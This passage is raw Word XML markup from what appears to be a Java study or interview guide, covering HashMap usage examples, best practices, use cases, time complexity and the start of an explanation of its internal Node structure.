          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495907A1" w14:textId="1A95BC07" w:rsidR="00A556DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556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380087"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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map</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get</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</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Output: B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F221B9" w14:textId="77777777" w:rsidR="00A556DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556DC" w:rsidP="00E37BA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348CA656" w14:textId="220E188D" w:rsidR="00BB01C4" w:rsidRPr="00CE4B95" w:rsidRDefault="00BB01C4" w:rsidP="00BB01C4">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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B348151" w14:textId="3EBD6030" w:rsidR="001D2084" w:rsidRPr="00CE4B95" w:rsidRDefault="001D20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color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import java.util.HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EEC941" w14:textId="07A11F25"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HashMapExampl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47AB9FD3"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stat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main</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String</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arg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1E1F39FF"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Create a HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F00A508"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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String</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Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> map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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C802FD"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02279103"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Add elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2BF2F"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map</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ut</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Appl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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D5686"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map</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ut</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Banana"</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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D4B77"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map</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ut</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Orang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30</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0914E695"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01DE8726"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Access elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F365F1"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Apple count: "</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map</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get</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Appl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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A9DAE"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5A9FDF7F"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Check if key exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424DE952"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Contains Banana? "</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map</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containsKey</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Banana"</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true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCD4FE"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1B83E4D3"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Remove element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEE303F"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map</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remove</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Orange"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BDA034"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After removal: "</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map</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Apple=10, Banana=20}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7B105"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000F0D9F"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Iterate through HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A4987"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for</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key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map</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keySe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4033A5CC"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key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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>": "</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map</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ge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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C5DDA"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10592667"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4722E55B"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Using entrySet() for iteration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5A6C8"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for</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Map</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Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String</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Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry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map</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entrySe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599C0E83"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entry</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getKey</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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>" =&gt; "</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entry</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getValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E598D9"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4D258DD4" w14:textId="77777777"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1A7406D3" w14:textId="5914DC08" w:rsidR="00BB01C4" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1D2B6" w14:textId="77777777" w:rsidR="00BB01C4" w:rsidRPr="00CE4B95" w:rsidRDefault="00BB01C4" w:rsidP="00E37BA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF11608" w14:textId="77777777" w:rsidR="00555B5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00555B5D" w:rsidP="00555B5D">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to Use HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE6E6C7" w14:textId="77777777" w:rsidR="00555B5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00555B5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>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need fast access to elements by key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B305122" w14:textId="77777777" w:rsidR="00555B5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00555B5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>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insertion and retrieval operations are frequent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A57479" w14:textId="77777777" w:rsidR="00555B5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00555B5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>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don't need to maintain insertion order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301AC48C" w14:textId="293BBD32" w:rsidR="00555B5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00555B5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When thread safety is not a requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0AD8E" w14:textId="5FE51AB0" w:rsidR="000A12F0" w:rsidRPr="00CE4B95" w:rsidRDefault="000A12F0" w:rsidP="000A12F0">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Best Practices</w:t>
      </w:r>
      <w:r w:rsidR="007D17C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6EE42C" w14:textId="77777777" w:rsidR="000A12F0" w:rsidRPr="00CE4B95" w:rsidRDefault="000A12F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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hoose </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initial capacity</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load factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wisely if you expect large volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB67204" w14:textId="0361E37F" w:rsidR="0026300C" w:rsidRPr="00CE4B95" w:rsidRDefault="0026300C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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immutable objects as keys to prevent unexpected behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58343FAE" w14:textId="77777777" w:rsidR="000A12F0" w:rsidRPr="00CE4B95" w:rsidRDefault="000A12F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>containsKey()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before using get() to avoid null confusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F2BEC" w14:textId="77777777" w:rsidR="00F945F2" w:rsidRPr="00CE4B95" w:rsidRDefault="00F945F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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verride equals() and hashCode() properly for custom key objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4EC74" w14:textId="77777777" w:rsidR="00F945F2" w:rsidRPr="00CE4B95" w:rsidRDefault="00F945F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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sider ConcurrentHashMap for multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48E5B2" w14:textId="77777777" w:rsidR="005627B3" w:rsidRPr="00CE4B95" w:rsidRDefault="005627B3" w:rsidP="005627B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9EC4B7" w14:textId="77777777" w:rsidR="005627B3" w:rsidRPr="00CE4B95" w:rsidRDefault="005627B3" w:rsidP="005627B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0130886A" w14:textId="566AAD2D" w:rsidR="005C6420" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6420" w:rsidP="005C6420">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Real-World Use Cases</w:t>
      </w:r>
      <w:r w:rsidR="007D17C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDFEE2" w14:textId="77777777" w:rsidR="005C6420" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6420">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E57FCAA" w14:textId="77777777" w:rsidR="005C6420" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6420">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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dexing data for quick lookups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408505E3" w14:textId="77777777" w:rsidR="005C6420" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6420">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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unting frequencies (e.g., word count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3FA051" w14:textId="77777777" w:rsidR="005C6420" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6420">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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pping IDs to entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F301AD7" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B" w:rsidP="00544C1B">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erformance Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63828226" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>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verage Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7C6B2" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>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et(): O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E5ACE" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>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t(): O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E56E5" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>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move(): O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA862A9" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>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tainsKey(): O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDDD493" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>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orst Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> (if all keys collide):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C30C374" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>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et(): O(log n) in Java 8+ (due to tree conversion), O(n) before Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6E786" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>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t(): O(log n) in Java 8+, O(n) before Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AACC3DE" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>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move(): O(log n) in Java 8+, O(n) before Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8D10A" w14:textId="3900C588" w:rsidR="00324AE3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00324AE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="0B899AB5">
          <v:rect id="_x0000_i1509" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3B9D2" w14:textId="77777777" w:rsidR="00DB0308" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB0308" w:rsidP="00DB0308">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2426D0D2" w14:textId="77777777" w:rsidR="00AD662A" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD662A" w:rsidP="00AD662A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Toc196307646"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain internal working of HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="520E778F" w14:textId="4E2CD90D" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="00C650C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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HashMap stores </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key-value pairs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a technique called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It offers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time complexity (on average) for put() and get() operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D8A96" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F342F">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6499393">
          <v:rect id="_x0000_i1510" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="728A439A" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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Internal Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20403DDA" w14:textId="77777777" w:rsidR="00720C6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00720C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430405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Node</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V</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mplement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Entry</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V</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B918E6A" w14:textId="77777777" w:rsidR="00720C6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00720C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430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hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A115783" w14:textId="77777777" w:rsidR="00720C6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00720C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430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K key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
